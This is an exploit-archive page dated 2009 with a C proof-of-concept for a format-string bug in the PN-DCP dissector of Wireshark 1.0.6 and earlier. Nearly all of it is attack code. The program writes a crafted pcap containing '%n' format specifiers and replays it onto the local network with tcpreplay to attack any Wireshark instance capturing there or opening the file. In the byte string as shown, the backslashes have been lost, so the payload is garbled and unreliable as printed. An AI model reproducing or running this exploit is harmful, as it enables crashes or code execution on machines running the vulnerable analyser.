Wireshark <= 1.0.6 PN-DCP Format String Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Wireshark <= 1.0.6 PN-DCP Format String Exploit PoC
# Published : 2009-03-30
# Author : THCX Labs
# Previous Title : Firefox 3.0.x (XML Parser) Memory Corruption / DoS PoC
# Next Title : Sami HTTP Server 2.x (HEAD) Remote Denial of Service Exploit

/*
################## THCX #######################################
# Wireshark <= 1.0.6 PN-DCP format string bug POC
###############################################################
# [!] autore: THCX Labs
# [!] PN-DCP eithor standalone or tunneld thru DCE/RPC
# [!] local open of pcapfile also working
###############################################################
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
char sploit[]=
"xd4xc3xb2xa1x02x00x04x00x00x00x00x00x00x00x00x00xffxffx00x00x01x00x00x00"
"x96x2cx8fx47x97xaax0dx00x22x00x00x00x22x00x00x00x00x02xe3x17xc7x50x00x80"
"xc8x38xa4x8bx81x00x00x00x88x92xfexfex05x00x01x00x00x01x00x01x00x04xffxff"
"x00x00x96x2cx8fx47x96xaex0dx00xd6x00x00x00xd6x00x00x00x00x80xc8x38xa4x8b"
"x00x02xe3x17xc7x50x81x00x00x00x88x92xfexffx05x01x01x00x00x01x00x00x00xb8"
"x02x05x00x10x00x00x02x01x02x02x02x03x02x04x02x05x01x01x01x02x02x01x00x0a"
"x00x00x53x37x2dx33x30x30x45x43x02x02x00x6ex00x00x25x6ex25x6ex25x6ex20x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x02x03x00x06x00x00x00x2ax01x01x02x04x00x04x00x00x02x00x01x02"
"x00x0ex00x01xc0xa8x00x0bxffxffxffx00xc0xa8x00x0bx97x2cx8fx47xf2xd0x0ex00"
"x32x00x00x00x32x00x00x00x00x02xe3x17xc7x50x00x80xc8x38xa4x8bx81x00x00x00"
"x88x92xfexfdx04x00x01x00x00x01x00x00x00x14x02x02x00x09x00x01x25x6ex25x6e"
"x25x6ex20x00x05x02x00x02x00x00x97x2cx8fx47x82xd2x0ex00x40x00x00x00x40x00"
"x00x00x00x80xc8x38xa4x8bx00x02xe3x17xc7x50x81x00x00x00x88x92xfexfdx04x01"
"x01x00x00x01x00x00x00x10x05x04x00x03x02x02x00x00x05x04x00x03x05x02x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00";
int main(){
FILE *fh;
int r;
fh=fopen("formatstringbug.pcap","wb");
if(!fh){perror("no open");exit(1);}
fwrite(sploit,sizeof sploit,1,fh);
fclose(fh);
r=system("tcpreplay -i eth0 formatstringbug.pcap");
return 0;
}

// www.Syue.com [2009-03-30]